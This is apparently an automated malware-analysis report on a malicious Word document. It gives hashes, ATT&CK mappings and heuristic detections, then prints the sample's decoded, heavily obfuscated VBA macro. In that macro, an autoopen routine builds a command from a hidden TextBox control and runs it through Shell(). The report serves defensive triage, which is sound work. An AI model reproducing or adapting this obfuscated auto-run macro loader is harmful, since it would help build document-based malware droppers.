Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03a5b4ce64c50344…

MALICIOUS

Office (OLE)

107.9 KB Created: 2018-12-14 03:08:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 0fc70a4c0f63e9ddf9a09d742f3f62ae SHA-1: 98f9d58cd6cf34617a9aaa5778a8e82e1c407628 SHA-256: 03a5b4ce64c50344302238b313893865ac21adf5f5e2030d2bd50f6fee81d7d5
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. Heuristics also indicate references to PowerShell and cmd.exe, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection 'Doc.Malware.Sonbokli-6786376-0' further confirms its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Sonbokli-6786376-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
    otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
       Select Case zkbUQkjGbBDiVRYfMOI
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    GiIvHcf
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.iec.ch In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9931 bytes
SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub

Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
   Select Case uiBizvUWjWiYSNqvNtF
      Case 211762241
         ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
         AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
         dQtNdFuhBwXmTzWEsi = 189480325
         RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
      Case 39275106
         FBoJwzSswQbkRbZBiB = 341471985
         JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
         UbjzdfVhrDuHGiFdjwN = 238092348
         kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
   End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
   Select Case tRMziBszBzUfDqRSVZtRtJ
      Case 327569417
         oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
         JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
         iYPczmLnjXCsrdA = 338269233
         lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
      Case 6686848
         fhoLiCDKVfzNujjQbjfO = 94362220
         OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
         SaiWkrqzJcvdcoc = 174944361
         rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
   End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
   Select Case IZZLRnBBKVJOwhQdEYCNfBU
      Case 226235697
         KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
         LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
         LOVXHZNOQkuNRTH = 326687805
         ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
      Case 337374978
         UrsXZaarzmLnRJanL = 1678958
         cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
         WwuMScbhSJokwGspohA = 189700483
         UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
   End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
   Select Case CYbWSLGdvrtmpNsolrw
      Case 81896631
         fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
         VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
         XmcSJCKicJCkRHEbpmjRh = 280516889
         URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
      Case 68298671
         jtbBLGaJZtSJZHOKnQpwk = 96834096
         FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
         BzLwLLCDobLjrTjGuBHdv = 220835322
         ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
   End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
   Select Case lVwlVOfIYfPvML
      Case 312551555
         FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
         uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
         LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
         ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
      Case 67441472
         MvUdBMiaKUJTitRA = 111466308
         WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
         SkSLLWlVCsTQLH = 170518531
         tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
   End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
   Select Case rptbBCRRihSiai
      Case 60944573
         XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
         IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
         XrMzfjfZuSkZlfzpHHobwiLk = 138290136
         jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
      Case 238460256
         qdSNjLzXjERjcArmPZnJEtzT = 76948995
         iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
         IwaIJBGXKFUGRKmufqfAdO = 56865580
         ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
   End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
   Select Case vzNqVzoNGQNPHLvbXZbGjz
      Case 113748171
         ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
         fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
         dwdoOQzAZlSvpYJmqVu = 263425614
         MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
      Case 317662200
         RJDdzhFoXFWZhNm = 25750100
         lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
         cwOuVcDMUfArIGLVclFVau = 135286722
         kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
   End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
   Select Case ujKHAHpoLmDwRwOtmKKuYHiC
      Case 52461296
         unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
         IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
         FKKaFjSBmuBrutaWIibTmE = 226726014
         ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
      Case 205701779
         zUuVsVqqNTsYAYOXTsVis = 322251076
         EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
         pwtssZmifqiMUPzRI = 195846377
         KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
   End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
   Select Case YlDWTLoHGrjnlMoihiaR
      Case 71876279
         tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
         EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
         jtMnEwjnFNUJSZdCvpLIm = 173795293
         SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
      Case 92173373
         prMiSSHaXYfWidwlrTIYA = 228422692
         oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
         rKJutiwVaqjGDHkvijHjmIM = 216434472
         fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
   End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
   Select Case GjuaofTcPWMGpQjUlpIpkd
      Case 185276828
         dYAidFWwcuAUNX = XtMCptkWviKLqj
         EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
         QqYPTaksFMtpcFbjP = 20969943
         CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
      Case 141964255
         SSjiUcrXpQQLwCZTTV = 54732018
         pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
         EjRRRKczcdUPJtPbCoQ = 298824932
         VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
   End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
   Select Case soTDKucXliYCMWWFznsaril
      Case 39353978
         pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
         LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
         tljzjCwKkZtTdccfKzofrkUq = 272859816
         zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
      Case 6284503
         radQWdfcIdzfjUbLwSiTTub = 111568322
         UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
         KNBpBYQuDqiJzLuQwOK = 273058841
         WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
   End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
   Select Case liQqczZjMqJlPNriiJuElFi
      Case 48292880
         fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
         wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
         PhMwfkmQZkSOJFLSzi = 107815517
         nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
      Case 229833539
         kMVBBFHbOwOmclcPcYqvwV = 218895407
         BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
         EEXMaXIiGkIfABfnAtqtn = 296723620
         FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
   End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
   Select Case jwzpVQCAzdJKkhXG
      Case 46771868
         rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
         JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
         KBIJtfjrrJUUPZXIV = 135102298
         OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
      Case 60937234
         zvULkWaYaMLjucCtmhdKcdpK = 305824814
         JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
         mHMFRTOhdttwvvPl = 48367220
         soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
   End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
   Select Case zkbUQkjGbBDiVRYfMOI
      Case 213553833
         MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
         dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
         wOcctFbwhThiNJG = 238962951
         ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
      Case 194425028
         XvkzJsKSFnzkhjrjYuj = 110884928
         mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
         itiojCOimwTaEtFGodAm = 111869160
         YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
   End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
   Select Case FRjiwhfsuzlmbuYhGYj
      Case 165473779
         HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
         YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
         qTmVssAwDfVwOOHOFM = 243232673
         jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
      Case 215693894
         zHjjREKzqnfimCFnf = 184445548
         TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
         XbDHjRIplHdDIlqHNaTiPjA = 96688268
         hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
   End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
   Select Case vfUpGjtUcoEJdzDmfDrlL
      Case 79390792
         FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
         oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
         WKPlGjRPqDSdwFQZ = 282489848
         zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
      Case 154770044
         nIWJRMziFpdRXGZ = 106030876
         uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
         kNoZDjlLJHhiIwUVH = 316186135
         iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
   End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
   Select Case TwJSozjKPHBZhHhw
      Case 324122818
         XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
         zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
         CZRnjPFDMTOdWaVjLZi = 40075943
         vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
      Case 53767800
         nCTVSkEsVlqQMMjbdnSzXYid = 71002413
         vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
         tqYFGPcTdsTmviCrztZSou = 184323825
         HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
   End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function